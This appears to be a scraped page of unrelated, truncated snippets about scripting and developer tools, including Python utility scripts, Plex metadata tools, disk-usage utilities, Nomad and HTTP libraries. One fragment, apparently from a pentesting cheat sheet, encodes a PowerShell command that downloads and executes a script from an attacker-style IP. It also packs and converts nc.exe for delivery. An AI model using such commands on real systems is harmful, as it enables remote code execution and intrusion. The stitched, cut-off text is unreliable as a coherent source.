this repository consists of some useful python scripts for personal use - c17hawke/useful-python-scripts
🐌 useful scripts for making developer's everyday life easier and happier, involved java, shell etc. 👉 平时有用的手动操作做成脚本,以便捷地使用,让开发的日常生活更轻松些。 💕 欢迎👏 💖 提问,提交 Issue 分享平时自己常用但没有写成脚本的功能(即需求、想法),提交Issue ...
When it comes to programming, Python is a much sought-after and easy-to-use language used for automating some of the repeated tasks. As machine learning and AI become mainstream, it is widely getting prominence as it is straightforward to learn. Simple mundane tasks like responding to emails,...
You’ve boosted your programming skills by learning how to do three really important tasks in the terminal: navigate the file system, manage Python packages withpip, and make commits to Git. Learning terminal commands is a great investment for you as a Python developer. Just take your time an...
Just A Bunch Of Plex Scripts Kometa Kometa (FKA Meta Manager (PMM))is a Python script to update metadata information for movies, shows, and collections as well as automatically build collections. Kometa (formerly known as Plex Meta Manager) is a powerful tool designed to give you complete con...
Bash for Windows#Base64 for Windows echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0 #Exe compression upx -9 nc.exe #Exe2bat wine exe2bat.exe nc.exe nc.txt #Compile Windows python ...
The problem with bothduanddfis they dump a lot of info on you and expect you to make sense of them. Again, very poor UX and it's often painful. Previously I've written Python scripts to make sense of this, but the newer duf and dust make this a breeze. ...
Supported by Linux, Mac, and Windows, Nomad is a single binary tool capable of scheduling all virtualized, containerized, and standalone applications. From a single container to a swarm of thousands, Nomad allows you to run 1 million containers across 5,000 hosts in a matter of minutes. Nom...
(updated), and it isthe most used scripting languagein practice; it has detailed documentation, a huge community, numerous ready-to-use scripts and well-supported frameworks; and most importantly, it’s much easier to get started with PHP than with other scripting languages (Python, for ...
Unirest is a pack of lightweight HTTP libraries for many languages (PHP, Ruby, Python, Java And Objective-C). It has support for GET, POST, PUT, UPDATE, DELETE operations and its methods + response structure are the same in all languages. The usage is very simple and straightforward. Als...